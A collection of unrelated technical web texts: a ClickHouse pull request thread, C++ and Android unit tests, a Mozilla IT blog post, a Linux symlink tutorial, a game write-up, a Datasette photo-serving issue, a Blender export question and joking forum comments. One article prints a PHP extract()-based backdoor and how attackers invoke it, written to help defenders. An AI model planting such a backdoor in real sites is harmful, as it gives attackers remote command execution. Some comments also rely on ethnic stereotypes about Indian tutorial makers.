trouble with males fighting. I had one very aggressive one, but dinner solved that problem.
OPCFW_CODE
Optimize empty IN subquery and empty INNER/RIGHT JOIN. I hereby agree to the terms of the CLA available at: https://yandex.ru/legal/cla/?lang=en Category (leave one): Performance Improvement Short description (up to few sentences): If the subquery is empty can quickly return. https://github.com/yandex/ClickHouse/issues/6615 Some tests have failed. This is the normal result: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) ┌─count()─┐ │ 0 │ └─────────┘ 1 rows in set. Elapsed: 0.008 sec. Processed 1.00 thousand rows, 8.00 KB (117.63 thousand rows/s., 941.06 KB/s.) This is the result of this pr: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) Ok. 0 rows in set. Elapsed: 0.014 sec. Expression Expression CreatingSets Lazy Aggregating Concat Expression Filter Limit Expression Expression Numbers Maybe should not be doing CreatingSetsBlockInputStream return quickly? Because "conut 0" is Aggregating the return, should we do something during IN or JOIN Expression? This is the normal result: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) ┌─count()─┐ │ 0 │ └─────────┘ 1 rows in set. Elapsed: 0.008 sec. Processed 1.00 thousand rows, 8.00 KB (117.63 thousand rows/s., 941.06 KB/s.) This is the result of this pr: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) Ok. 0 rows in set. Elapsed: 0.014 sec. Expression Expression CreatingSets Lazy Aggregating Concat Expression Filter Limit Expression Expression Numbers Maybe should not be doing CreatingSetsBlockInputStream return quickly? Because "conut 0" is Aggregating the return, should we do something before the IN or JOIN Expression? @nicelulu That becomes more interesting. To get proper result for aggregation query, you have to provide empty data stream before Aggregating and not after CreatingSets. Let's think how to do it... Maybe should not be doing CreatingSetsBlockInputStream return quickly? Yes, this is not the correct way of implementation. We need to check if the set is empty deeper in query execution pipeline. @alexey-milovidov Maybe I can use the action sequence in ExpressionActions to determine an IN or JOIN? SELECT count() FROM system.numbers WHERE (number IN ( SELECT toUInt64(1) WHERE 0 )) AND (number != 1) In fact, for IN, I need to consider short-circuit AND operation. If it is OR, I can't use this optimization. For Functional stateless tests "00017_in_subquery_with_empty_result" This PR result : SET output_format_write_statistics = 0 Ok. 0 rows in set. Elapsed: 0.004 sec. SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) FORMAT JSON { "meta": [ { "name": "count()", "type": "UInt64" } ], "data": [ { "count()": "0" } ], "rows": 1, "rows_before_limit_at_least": 0 } 1 rows in set. Elapsed: 0.015 sec. 00017_in_subquery_with_empty_result.reference result: { "meta": [ { "name": "count()", "type": "UInt64" } ], "data": [ { "count()": "0" } ], "rows": 1, "rows_before_limit_at_least": 1000 } Maybe it's normal? Maybe it's normal? Yes, it's perfect.
GITHUB_ARCHIVE
#include <goldfish/schema.h> #include <goldfish/json_reader.h> #include "dom.h" #include "unit_test.h" namespace goldfish { struct library_misused {}; struct throw_on_error { static void on_error() { throw library_misused{}; } }; TEST_CASE(test_filtered_map_empty_map) { auto map = json::read(stream::read_string("{}")).as_map("10", "20", "30"); test(map.read_by_schema_index(0) == nullopt); seek_to_end(map); } TEST_CASE(test_filtered_map) { auto map = json::read( stream::read_string("{\"10\":1,\"15\":2,\"a\":\"b\",\"40\":3,\"50\":4,\"60\":5,\"80\":6}")). as_map("10", "20", "30", "40", "50", "60", "70", "80", "90"); // Reading the very first key test(dom::load_in_memory(*map.read_by_schema_index(0)) == 1ull); // Reading index 1 will force to skip the entry 15 and go to entry 40 test(map.read_by_schema_index(1) == nullopt); // Reading index 2 will fail because we are already at index 3 of the schema test(map.read_by_schema_index(2) == nullopt); // We are currently at index 3 but are asking for index 5, that should skip the pair 40:3 and 50:4 and find 60:5 test(dom::load_in_memory(*map.read_by_schema_index(5)) == 5ull); // We ask for index 6, which brings to index 7 (and returns null) // Asking for index 7 should return the value on an already read key test(map.read_by_schema_index(6) == nullopt); test(dom::load_in_memory(*map.read_by_schema_index(7)) == 6ull); // finally, ask for index 8, but we reach the end of the map before we find it test(map.read_by_schema_index(8) == nullopt); seek_to_end(map); } TEST_CASE(filtered_map_skip_while_on_value) { auto map = json::read(stream::read_string("{\"20\":1}")).as_map("10", "20"); test(map.read_by_schema_index(0) == nullopt); seek_to_end(map); } TEST_CASE(test_filtered_map_by_value) { auto map = json::read(stream::read_string("{\"B\":1}")).as_map("A", "B"); test(dom::load_in_memory(*map.read("B")) == 1ull); seek_to_end(map); } TEST_CASE(test_missing_seek_to_end_err) { auto a = json::read(stream::read_string("[{}]"), throw_on_error{}).as_array(); auto map = a.read().value().as_map("A", "B"); test(map.read("A") == nullopt); // Even though in this particular example, the map reached the end, it's still invalid to read from a // because map.read("A") might have returned null because "A" wasn't found (and "B" might still be in the map) expect_exception<library_misused>([&] { a.read(); }); } }
STACK_EDU
In most ways, right now at least, you can’t. We’re too closed. It’s like I said in my first blog post, IT is generally closed. Mozilla is not. There’s a incredible disconnect there. How do we leverage the expertise of the Community in running some of the busiest websites in the world? In my travels over the past year I’ve met a number of passionate volunteers with IT skills who are looking for different ways to volunteer and contribute to Mozilla. In the past two months, that list has exploded. I’ve talked about how we want to reboot Air Mozilla, how we want to open video and make it possible for more people to tell the Mozilla story in video. But Mozilla IT is still closed. Help me change it? I want to illustrate what we want to do.Watch this to see how we want to pivot to open. Good question. I think I need your help to figure this out. It’s going to feel weird and uncomfortable for us. Of all the steps we set out to do nearly two months ago, this has been the most challenging. There are so many processes to work out. - What sort of agreement should volunteer Mozilla IT sign? A code of conduct? There are some parts of the infrastructure that must remain secure and secret even as we strive to be open. - How do we build the trust necessary to give someone root access? - How do we on-board new Mozilla IT volunteers? Does everyone get root access on day one? Is there some graduated process? What is it? - Do we host onsite (or remote) training events to teach you about our tools and processes? Today, as a code contributor, we ask you to sign a Committer’s Agreement. It’s a simple document that shows you understand what it means to contribute code to Mozilla and understand our legal requirements. As part of Mozilla IT, you’ll have access to some pretty mission critical systems. I invite you to take a look at the Mozilla IT Agreement and share your feedback with us. It’s meant to be a lightweight agreement similar to the Committer’s Agreement. Want to get involved? We’re doing a lot of this thinking out in the open at https://wiki.mozilla.org/IT/CommunitySysadmin and I invite you to join and participate – - Read the Mozilla IT Agreement. - Read Dustin’s blog post and how we’re trying to identify bugs you can start working on. - Join the Mozilla Community Directory @ https://mozillians.org/ (Read this blog post if you forgot why it’s important!). - Join the conversation on the Community IT mailing list. Help us answer these questions. - Join the IRC channel, irc://irc.mozilla.org/it - Actually get involved. Do IT. We have a number of positions we’re looking for you to help in: Preparing for 2012 I want to reiterate two of my goals I mentioned in my first post nearly two months ago. My own personal goals by the end of 2012 are: - to have 5-10 volunteer Community Sysadmins actively helping run Mozilla’s network and servers. - to have a vibrant Community IT group… I made the comment that it felt like the most ambitious thing we’ve done. It probably still is but in two months we’ve shifted our way of thinking, took Air Mozilla Mobile on the road and have a long list of things you need from us. 2012 will be fun.
OPCFW_CODE
A link in Linux systems are pointers to a file or a directory. There are two types of links in Linux, namely soft and hard links. In this article, we will examine soft links in detail. Similar to shortcuts in Windows, soft links, also known as symbolic links, point to a file without storing the file’s contents. Any changes made to either the file or the soft link, are reflected in both the versions of the file. Representation of Soft Links in Linux After understanding the concept of soft links, we need to know how to spot a soft link in a file-system. 'ls' command provides a color scheme for every different component in the Linux file-system. Soft links are denoted by In the above output, 'program' are soft links. It may happen that some systems have modified their default color schemes and therefore are unable to figure out the soft links. Using the ls -l command, we can clearly find out links present in a directory. Not only does it specifies links in the directory, but also displays the original file location or directory for a soft link. Similar to shortcuts in Windows, Linux provides a hint in the icons of soft links. The GUI icons for soft links contains arrow signs at the bottom-right corner. It is quite evident from the figure that soft link named 'desktop' is a pointer to a directory whereas 'program' points to a ‘.cpp’ file. How to create a soft link in Linux? Now that we have seen the methods of spotting a soft link, we will learn how to create soft links in Linux. This is done with the help of ln -s <PATH>/<ORIGINAL_FILE> <LINK_NAME> 'ln' command is specifically used to create a link in Linux. The '-s' option used in the above command represents the creation of a soft link. 'ls -l' command, we can check whether the creation of a soft link was successful or not. Editing the original file Since a soft link is just a symbol for the original file, any changes made in the original file will be reflected in the soft link as well. Let us demonstrate the changes: - Original File – “my_program.cpp” in the Documents folder - Soft Link – “program” on the Desktop We will use the sed command to edit the original file. sed -i "s/main/disdain/g" my_program.cpp The above command simply finds all the occurrences of the word “main” and replaces each one of them with the word “disdain”. 'program' file present on the Desktop is a soft link, therefore has to reflect the changes made in the original file. Editing the Content through a Soft Link Editing the contents of a soft link reflect changes in the original file as well. This can be demonstrated by the following screenshot: As previously mentioned, 'program' is a soft link. Using 'echo' command, we append the word “Edited” to the soft link. We can clearly see the changes that happen in the original file 'my_program.cpp' as well. Note: While editing the soft link we did not use 'sed -i'command, as in the process, the soft link is removed and a new file is created with the same name. We will see later that removing the original file and placing it back, preserves the link. Identify Broken Soft Links in Linux The soft links break when we delete the original file. When using the ‘ls’ command, broken links are displayed in red color with a black background. In the above figure, we move the original file to the current directory. When we remove the original file from their original location, we can see the change in color on a soft link. Fix broken links Every soft link points to an originating file. We can easily fix a broken link by replacing the original file with another file of the same name. I’ve demonstrated the same below. Removing a soft link in Linux The easiest way to remove a soft link is using the 'rm' command followed by the link name. There is one another way to remove links in Linux. It is done by Soft link of a soft link 'ln' command, let us create a soft link to our previously created soft link. ln -s <LINK_NAME> <NEW_LINK_NAME> It is quite clear that these links form a chain. A change in any one of the links will be reflected in every one of the files. Since, the continuous links form a chain, removing any of the in-between links, will break the child links. For instance, if we remove the first soft link 'program', the child link will break. When we break the link in the middle, the complete chain breaks. Soft links are a common Linux feature that links libraries and files in Linux file-systems. This article covers up the creation, properties, and removal of soft links in Linux. We hope the article was easy for you to understand. Feel free to comment below for queries or suggestions.
OPCFW_CODE
My first entry for NANY 2011 is: WhirlyWord This is a simple puzzle game based loosely around mating Scrabble with a slot machine. Spin the reels and try to make the words shown in the list. - Why were the NANY applications coded? (I mean why decide to code this particular app) I fancied doing a simple game again this year after I had quite a lot of fun coding up Twigatelle for last year's NANY. I wondered if I would be able to re-create the effect of spinning reels in a nice way, from scratch. No doubt I "discovered" a very standard way of doing that trick, but I get some satisfaction of trying to solve these things myself. - What IDE did you use, if any? I used IntelliJ IDEA from JetBrains. It's a Jave IDE I've used for years now: I'm very comfortable with it, and I find it about the nicest IDE I've personally tried. - What language(s) is the application written in? Java, and is launched using Java Web Start from my site http://head-in-the-clouds.com - Does it rely on any 3rd party libraries / code / graphics? All of the code is my own. The graphics are all generated on-the-fly, using procedural textures that I developed last year for Twigatelle, or in the case of the reels, simple text with filters on top. Didn't even borrow any icons for this one - Were any clever design principles used? Not really. Java 2D was not too bad to get going in the first place, and I lifted a lot of the Twigatelle code for the basic animation of the reels. Being Java, the code is reasonably object-oriented, a bit verbose but easy to maintain. It's probably about 20,000 lines of code, although the main game loop itself is probably only about 10% of that. It's all the faffing about with loading resources, creating textures, beziers, particles etc. that add up. - Or any really hairy algorithms that you'd like to boast about? The only "clever" thing that I think is worth mentioning is the motion-blur on the reels when they are spinning. I was pretty pleased with the effect, as I may have mentioned - What was the trickiest part? Getting the dictionary in place. In the end I wrote a little sub-program to find seven letter words that had at least 120 valid anagrams each, pulled from a public domain word list. - Would you like to make a mention of any other DC members who helped out? There were some nice messages from a few folks, and, in alphabetical order, I would like to particularly thank Cranioscopical, Deozaan, Mouser, and Stephen66515 who all made suggestions that I feel improved the game. I also want to thank Perry one more time, since he worked so hard on keeping all us "nanyteers" organised.
OPCFW_CODE
When a site gets compromised, the attacker will usually leave a piece of software behind that will allow them easy access to the website the next time that they visit. This type of malware is called a Backdoor and it usually allows an attacker to bypass normal authentication controls to control the website. Backdoors are typically very hard to find, usually look like normal website code, are often protected (encrypted/encoded/password protected) and can be anywhere on a website – file system or database. This particular backdoor is not new – in fact it has been around for a few years and is well documented, although seems to have had a resurgence with a couple of websites having been affected over the last few weeks – hence it is worth putting out the information again for web developers to be aware of. The code to search for: What does this code do? Well, for starters, it does not trigger alarm bells as it does not have any of the functions that normally allow for code execution, such as “exec”, “system”, “eval”, “assert” etc. This means that most automated signature-based malware detection systems will not find anything. So how does an attacker leverage the “extract” function? The “extract" function imports variables into the current symbol table from an array (from the php manual http://php.net/manual/en/function.extract.php). Nothing seems too serious or dangerous with that? When you analyse this code: @extract($_REQUEST); it is extracting any GET or POST requests. The next bit of code: @die($ctime($atime)); is executing on @die whatever the attacker sends as “ctime” with “atime” as an argument. So if an attacker wants to list all contents of a directory on a website, they enter in the following url into their browser: Hey presto, the attacker has the full directory structure. What they then do is utilise additional commands such as, cat or echo to modify files. While not quite as feature rich as a webshell like filesman or P.A.S., this is a remote command execution script – very difficult to detect and highly effective. How to defend against this type of attack?In cases such as this where the code evades detection from automated signature-based malware detection systems, additional controls and checks need to be taken. Here are a couple of tips: - File change monitoring – developers need to understand what is changing on the website from day to day. Changes made by one of your team = GOOD. Other changes = BAD. Likely to be attacker activity. Check any code that has changed and that you are not aware of. - Patching – ensure your software is kept up to date. Example, the Magento Shoplift has been out for over a year with patches available to plug the vulnerability. Websites who patched quickly were not hacked. Websites who have been slow to patch are perfect targets for attackers to focus on. In fact if you have not patched your website for the Magento Shoploft vulnerability, there is a good chance your site has been attacked and compromised by now. - Web application firewall – for those who may be unable to quickly deploy software updates, a web application firewall provides an additional layer of protection to a website and may be the difference between getting attacked and getting compromised. Get in touch if you need help with securing your website.
OPCFW_CODE
Ability to serve an Apple Photo from its place on disk A custom Datasette plugin that can be run locally on a Mac laptop which knows how to serve photos such that they can be seen in the browser. Originally posted by @simonw in https://github.com/dogsheep/photos-to-sqlite/issues/19#issuecomment-624406285 The apple_photos table has an indexed uuid column and a path column which stores the full path to that photo file on disk. I can write a custom Datasette plugin which takes the uuid from the URL, looks up the path, then serves up a thumbnail of the jpeg or heic image file. I'll prototype this is a one-off plugin first, then package it on PyPI for other people to install. The plugin can be generalized: it can be configured to know how to take the URL path, look it up in ANY table (via a custom SQL query) to get a path on disk and then serve that. Here's rendering code from my hacked-together not-yet-released S3 image proxy: from starlette.responses import Response from PIL import Image, ExifTags import pyheif ... # Load it into Pillow if ext == "heic": heic = pyheif.read_heif(image_response.content) image = Image.frombytes(mode=heic.mode, size=heic.size, data=heic.data) else: image = Image.open(io.BytesIO(image_response.content)) # Does EXIF tell us to rotate it? try: exif = dict(image._getexif().items()) if exif[ORIENTATION_TAG] == 3: image = image.rotate(180, expand=True) elif exif[ORIENTATION_TAG] == 6: image = image.rotate(270, expand=True) elif exif[ORIENTATION_TAG] == 8: image = image.rotate(90, expand=True) except (AttributeError, KeyError, IndexError): pass # Resize based on ?w= and ?h=, if set width, height = image.size w = request.query_params.get("w") h = request.query_params.get("h") if w is not None or h is not None: if h is None: # Set h based on w w = int(w) h = int((float(height) / width) * w) elif w is None: h = int(h) # Set w based on h w = int((float(width) / height) * h) w = int(w) h = int(h) image.thumbnail((w, h)) # ?bw= converts to black and white if request.query_params.get("bw"): image = image.convert("L") # ?q= sets the quality - defaults to 75 quality = 75 q = request.query_params.get("q") if q and q.isdigit() and 1 <= int(q) <= 100: quality = int(q) # Output as JPEG or PNG output_image = io.BytesIO() image_type = "JPEG" kwargs = {"quality": quality} if image.format == "PNG": image_type = "PNG" kwargs = {} image.save(output_image, image_type, **kwargs) return Response( output_image.getvalue(), media_type="image/jpeg", headers={"cache-control": "s-maxage={}, public".format(365 * 24 * 60 * 60)}, ) datasette-media will be able to handle this once I implement https://github.com/simonw/datasette-media/issues/3 As that seems to be closed, can you give a hint on how to make this work? Sure, I should absolutely document this! I'll add a proper section to the README, but for the moment here's how I do this. First, install datasette and the datasette-media plugin. Create a metadata.yaml file with the following content: plugins: datasette-media: photo: sql: |- select path as filepath, 200 as resize_height from apple_photos where uuid = :key photo-big: sql: |- select path as filepath, 1024 as resize_height from apple_photos where uuid = :key Now run datasette -m metadata.yaml photos.db - thumbnails will be served at http://<IP_ADDRESS>:8001/-/media/photo/F4469918-13F3-43D8-9EC1-734C0E6B60AD and larger sizes of the image at http://<IP_ADDRESS>:8001/-/media/photo-big/A8B02C7D-365E-448B-9510-69F80C26304D I also made myself two custom pages, one showing recent images and one showing random images. To do this, install the datasette-template-sql plugin and then create a templates/pages directory and add these files: recent-photos.html <h1>Recent photos</h1> <div> {% for photo in sql("select * from apple_photos order by date desc limit 100") %} <img src="/-/media/photo/{{ photo['uuid'] }}"> {% endfor %} </div> random-photos.html <h1>Random photos</h1> <div> {% for photo in sql("with foo as (select * from apple_photos order by date desc limit 5000) select * from foo order by random() limit 100") %} <img src="/-/media/photo/{{ photo['uuid'] }}"> {% endfor %} </div> Now run datasette -m metadata.yaml photos.db --template-dir=templates/ Visit http://<IP_ADDRESS>:8001/random-photos to see some random photos or http://<IP_ADDRESS>:8002/recent-photos for recent photos. This is using this mechanism: https://datasette.readthedocs.io/en/stable/custom_templates.html#custom-pages https://github.com/dogsheep/dogsheep-photos/blob/dc43fa8653cb9c7238a36f52239b91d1ec916d5c/README.md#serving-photos-locally-with-datasette-media I'll add docs on using datasette-json-html too. https://github.com/dogsheep/dogsheep-photos/blob/0.4.1/README.md#serving-photos-locally-with-datasette-media
GITHUB_ARCHIVE
package io.keepcoding.everpobre; import android.database.Cursor; import android.test.AndroidTestCase; import io.keepcoding.everpobre.model.Note; import io.keepcoding.everpobre.model.Notebook; import io.keepcoding.everpobre.model.dao.NoteDAO; import io.keepcoding.everpobre.model.dao.NotebookDAO; import io.keepcoding.everpobre.model.db.DBConstants; public class NoteDAOTests extends AndroidTestCase { public void testInsert() { NotebookDAO notebookDao = new NotebookDAO(getContext()); Notebook notebook = new Notebook("Notebook"); notebookDao.insert(notebook); NoteDAO noteDao = new NoteDAO(getContext()); Note note = new Note(notebook, "To dos"); Cursor c = noteDao.queryCursor(); assertNotNull(c); int numRecords = c.getCount(); assertNotNull(notebook); assertNotNull(noteDao); noteDao.insert(note); c = null; c = noteDao.queryCursor(); assertTrue(numRecords + 1 == c.getCount()); } public void testDelete() { NotebookDAO notebookDao = new NotebookDAO(getContext()); Notebook notebook = new Notebook("Notebook"); notebookDao.insert(notebook); NoteDAO noteDao = new NoteDAO(getContext()); assertNotNull(noteDao); for (int i = 0; i < 10; i++) { Note note = new Note(notebook, "To do " + i); assertNotNull(note); noteDao.insert(note); } Cursor c = noteDao.queryCursor(); assertNotNull(c); int numRecords = c.getCount(); assertTrue(numRecords > 0); c.moveToFirst(); noteDao.delete(c.getLong(c.getColumnIndex(DBConstants.KEY_NOTE_ID))); c.close(); c = noteDao.queryCursor(); assertTrue(numRecords-1 == c.getCount()); } public void testDeleteAll() { NoteDAO noteDao = new NoteDAO(getContext()); assertNotNull(noteDao); noteDao.deleteAll(); Cursor c = noteDao.queryCursor(); assertNotNull(c); int numRecords = c.getCount(); assertTrue(numRecords == 0); } public void testUpdateNote() { NotebookDAO notebookDao = new NotebookDAO(getContext()); Notebook notebook = new Notebook("Notebook"); notebookDao.insert(notebook); NoteDAO noteDao = new NoteDAO(getContext()); assertNotNull(noteDao); Note note = new Note(notebook, "Update me! "); assertNotNull(note); long insertedId = noteDao.insert(note); note = null; note = noteDao.query(insertedId); assertNotNull(note); note.setText("Updated!"); noteDao.update(insertedId, note); note = null; note = noteDao.query(insertedId); assertNotNull(note); assertEquals("Updated!", note.getText()); } }
STACK_EDU
Join GitHub today GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.Sign up docker trust: view, revoke, sign subcommands (experimental) #472 This PR introduces the In this PR, we introduce three subcommands: Several copyedit-style comments. In addition, scrub all occurrences of "like so", "please", and future-facing prose like "will sign" or "will create". In docs, we live in the eternal present and we don't say "please". :) Likewise, the phrase "note that". This is a big change so I looked over the first two commands for now. Re: testing, I think the tests you have look great, but we need to fake the notary client so we're not actually making HTTP requests in unit tests. An end-to-end test for each of the commands (inspect, revoke, sign) would be great as well. We'll want to add a notary service to compose-env.yaml so we're testing against an isolated service. I think that can be done in a separate follow up PR. We just merged https://github.com/docker/cli/blob/master/TESTING.md which has a bit more information as well @dnephin: thank you for the review! I've addressed all comments except for the following: Some small updates: I've made a couple of tweaks to address small discrepancies in CLI output and we also have an interface for a trust repository incoming from Notary theupdateframework/notary#1220 that will help provide testable mocks for this PR. I'll update here once that is merged and vendored. LGTM, left a couple comments. I think maybe for the tests we should stick to the alice/bob/claire convention and not use real names. Also had a question about two of the tests that seem to be really testing for the same condition... Sorry for being late in reviewing (catching up after my vacation). I gave this PR a spin, and wrote up more from a UX perspective after playing around with it Some inconsistencies from an UX perspective: docker trust inspect doesn't default to docker trust inspect without specifying a :tag, lists all tags for the repository. This is inconsistent with other commands, which default to :latest if the tag is omitted. For comparisson, docker pull requires adding the --all-tags flag to pull all tags from the repository; docker pull --help Usage: docker pull [OPTIONS] NAME[:TAG|@DIGEST] Pull an image or a repository from a registry Options: -a, --all-tags Download all tagged images in the repository --disable-content-trust Skip image verification (default true) --help Print usage docker trust inspect should use the same approach: inspect :latest by default, and have an --all-tags flag to fetch all tags. sha256: prefix missing for digests docker image ls --digests includes the sha256: prefix in the DIGEST column. We should probably print it here as well (also in case other hashing is used in future?) REPOSITORY column in output of docker trust inspect Also for consistency; perhaps we should have a TAG columns in the output; more consistent with docker images, and would allow accepting multiple repositories as argument in future ( docker trust inspect <repo1> <repo2>) Is there a way to show unsigned tags in a repository? Thinking out loud here: as a user, I may be interested to check which tags in a repository are not yet signed (so that I can sign them). Once a --filter option is added, those could be omitted (or included if the default should be to only show signed tags). $ docker trust inspect myname/myrepo REPOSITORY TAG DIGEST SIGNERS myname/myrepo latest 99ccecf3da28a93c063d5dddcdf69aeed44826d0db219aabc3d5178d47649dfa (Repo Admin) myname/myrepo v1.0.0 974c59c89665e01151571c6a50c0b7ef0bee941ef16d81ced1cf29073547ea8a <none> myname/myrepo v1.0.1 7713b80b59cfc144ef87b3f272d156ce2dbf0f6b3ec4c1171c0c3d8b2ac229b7 <none> Output format of docker trust inspect This is a bit tricky: historically, all our inspect commands output as JSON by default, allowing to use a custom format ( --format), and for some commands, having a --pretty option to print in a more human-readable format. I realize that the JSON output is not very useful to quickly view information, so definitely see a need to have a default that's more readable. From a consistency perspective though, docker trust inspect should output JSON. So what's the alternative? I was thinking of that a while back; perhaps we should start thinking of a new set of subcommands for Docker objects that default to a human-readable format; something like docker <object> print, docker <object> view or docker <object> show. If we can come to an agreement on that, the docker trust subcommand could be the first type of "object" to use such a command (e.g., docker trust view <repo>[:tag]). We can keep a docker trust inspect subcommand for later addition if we want. docker trust sign and pushing Wondering if it's always desirable to push the image, or if there should be an option to either make pushing optional, or to disable pushing. I just signed another image, and noticed it did a push before asking for my passphrase to sign the image. I did not expect that (in my mental model, signing and pushing are separate actions); I would've expected a confirmation to sign (and push) the image, especially since accidentally selecting the (wrong) image will overwrite existing images in the registry. docker trust sign alternative keys? Just wondering here: Is there a way to specify which key to sign an image with? Could I have multiple keys, and need to specify which key to use? If so; should there be a docker trust keys subcommand, showing all keys that I have present? Unauthorized shows HTTP status code Not sure we should print HTTP status codes here, feels like an implementation detail. If we do want more information, I'd be interested what server returned that error (also, is that configurable? where can I find it?). $ docker trust sign foo:latest you are not authorized to perform this operation: server returned 401. Instructions could use some formatting The instructions when signing could use a bit of reformattting; it's quite a wall of text. $ docker trust sign thajeztah/testing:latest You are about to create a new root signing key passphrase. This passphrase will be used to protect the most sensitive key in your signing system. Please choose a long, complex passphrase and be careful to keep the password and the key file itself secure and backed up. It is highly recommended that you use a password manager to generate the passphrase and keep it safe. There will be no way to recover this key. You can find the key in your config directory. Enter passphrase for new root key with ID 9636fc9: Repeat passphrase for new root key with ID 9636fc9: Enter passphrase for new repository key with ID 94fb4d2: Repeat passphrase for new repository key with ID 94fb4d2: you are not authorized to perform this operation: server returned 401. Quotes between repo and tag docker trust sign thajeztah/testing:latest Enter passphrase for root key with ID 9636fc9: Enter passphrase for new repository key with ID 19ba70d: Repeat passphrase for new repository key with ID 19ba70d: Enter passphrase for new thajeztah key with ID 9ae2e44: Repeat passphrase for new thajeztah key with ID 9ae2e44: Created signer: thajeztah Finished initializing signed repository for thajeztah/testing:latest The push refers to a repository [docker.io/thajeztah/testing] 2d37a63fe311: Pushed db8bf4510ce1: Mounted from library/python 4af7c20a45bb: Mounted from library/python 07d54c9d22d6: Mounted from library/python 590266e37bf8: Mounted from library/python ba2cc2690e31: Mounted from library/python latest: digest: sha256:43a0097ba50ce3a0547316a1142d7cc46062d051155f760e28619e8d99cddc25 size: 1579 Signing and pushing trust metadata Enter passphrase for thajeztah key with ID 9ae2e44: Successfully signed "docker.io/thajeztah/testing":latest In the last line, there's quotes around the repository, and the :latest tag is printed outside of the quotes: Successfully signed "docker.io/thajeztah/testing":latest Also wondering if it should print the digest that was signed as well. I think the most pressing issue that we should address in this PR is renaming For Content Trust (and We intentionally omitted this since it is repetitive information at present. I'd be inclined to add the prefix once we support multi-hashing - WDYT? We intentionally omitted unsigned tags because they are unpullable with We've discussed this at length with @dnephin: IIRC we agreed to potentially add JSON output controlled by a flag in the future - though as you mention this isn't consistent with other We had initially named this command If the image doesn't exist: As for the ordering of push and signing: this mimics the behavior users are accustomed to from We're actually just about to follow up with This is also an issue in DCT: I'm happy to update this but I'd prefer this to be a separate PR to update both errors for consistency. This is also from DCT and Notary, but I think this is necessary. It is a lot of text but it is interactive and for entering sensitive passphrases. This is an issue across both DCT and It's printed a couple of lines above.
OPCFW_CODE
Why are two exported FBX files with the same nodes and property values rendering differently? I've built a 3D environment that looks like this (I'm using the game engine Monogame; but I don't think the game engine plays a part in this problem) I'm using external assets for the terrain tiles, given as FBX files (in the graphics shown there are 4 such tiles). The way the FBX files come; they need their path to their texture updated. To get around this I import them into Blender (v3.4), make necessary fixes, and re-export them as new FBX files (producing a version that the game engine is able to deal with). Essentially, I found two ways to convert the FBX files, (1) by updating the texture file reference, or (2) removing and recreating the material. While between these options 1. is more direct and obvious, I just assumed it shouldn't be a problem to do 2. by copying over any material properties. But I'm not able to do this perfectly, getting a slightly darker render. It looks like I'm missing a configuration somewhere; possibly expressing something interesting. Whatever it is, I'm curious to know what is wrong with this idea, or where the hidden settings are. Method 1 I import the external fbx from a new Blender document deleting all existing objects, then File > Import > FBX (.fbx), choosing CPT_Terrain_M_f_13.fbx. Showing I change the file reference of the existing Image Texture node (in the Shader Editor) to point to my own copy of the terrain texture CPT_Terrain_Texture_Atlas_01.png (located in my game-engine folder, the same directory that I export to below). It is also necessary to turn the Alpha up, for some reason the import comes with Alpha = 0 (perhaps it has something to do with the problem?). The only other change I make is 'Apply all transforms' (written into the export script). I complete the export by running this script (saving the terrain-tile directly to the game engine folder). Without any change to the game engine itself, if I now run my game it will show the top render. import bpy def exportFbx(filenamepath): bpy.ops.object.transform_apply(location=True, rotation=True, scale=True) bpy.ops.export_scene.fbx(filepath = filenamepath, path_mode = 'STRIP', axis_up = 'Z') exportFbx('Z:\\github\\LSystemsMG\\LSystemsMG\\Content\\terrain-tiles\\CPT_Terrain_M_f_13.fbx') Method 2 I start in the same way, (i) open a new Blender file (ii) delete all objects (iii) import the same FBX file. Now, instead of changing the existing texture I delete and replace the existing material; effecting a new Principled BSDF node and Material Output node, I add to this a new Image Texture node and Normal Map node so that they are the same as observed (i.e. I set Normal Map to 'Tangent Space' and draw a connection to the BSDF). With this only the Specular and Roughness components in the Principled BSDF are different, otherwise all settings are the same. I then export the FBX using the same Python script. This leads my game to producing the second darker render. Properties seen All the Material properties and properties in the Shader Editor are the same in both cases at time of export. I found the answer; there are hidden properties in the materials not used by Blender but are still exported with FBX and, evidently, used by external parties such as my game engine's shaders (Monogame). Searching with scripts I found quite a few obscure values, but there was only one that I needed to change in my case, namely, the default value for the pincipled BSDF Base Color Yes, there's a hidden value behind the texture node that is exported with FBX. The value can be read bsdf = bpy.data.objects[0].data.materials[0].node_tree.nodes['Principled BSDF'] hidden_color_value = bsdf.inputs['Base Color'].default_value In my case the new material I created needed to be updated from (0.8,0.8,0.8,1) to (1,1,1,1) to behave the same as the other def setPrincipledBsdfBaseColorDefaultValue(r, g, b, a): bsdf = bpy.data.objects[0].data.materials[0].node_tree.nodes['Principled BSDF'] bsdf.inputs['Base Color'].default_value = (r, g, b, a) setPrincipledBsdfBaseColorDefaultValue(1,1,1,1)
STACK_EXCHANGE
Frankly if the person making the YouTube video doesn't have an Indian accent then I'm moving on until I find the one that does. Microphone with a fan right next to it also applies "HEY GUYS IT'S DERPITDY123 HERE WITH ANOTHER VIDEO WHERE I SHOW YOU HOW TO DO WHATEVER WHILE I MAKE OUT WITH MY MICROPHONE!" Probably the most important part With the sound of the keyboard clacking. And the world's thickest Eastern European / Indian accent It's sarcasm, but with a healthy dose of truth behind it. One of those spammy aggregator websites that dominate Google results with Markov-generated content scraped off Quora and StackOverflow. halo tdai I'll be showng he to acquire Bob and vagene sorry bout that guys As an Indian who rarely faced issues where I have to go find a YouTube video for a solution, (I search for solution of the issue on the internet like a needle in a haystack. Stackoverflow, git issues, ubuntu forums, other relevant communities etc.), how helpful are the videos of my fellow Indians? Idk if it's sarcasm. nope just the sound of the computer fan and heavy breathing You can't miss the most important part of asking a question in stack overflow and being told by 30 scrubs that it's been asked before even though yours is an entirely different language or that you've already mentioned that a library used in the other question is blocked at your company. Even better - no sound at all Please do the needful and kindly like and subscribe I'd say exaggeration instead of sarcasm. All the Indian dudes I've seen explaining IT stuff are really understandable and have really helped me with uni Exactly why I do absolutely everything I can to avoid making a new topic. I’d rather search an issue for 2 days to find an answer even nearly relevant which I can adapt. I’m too scared of the folk 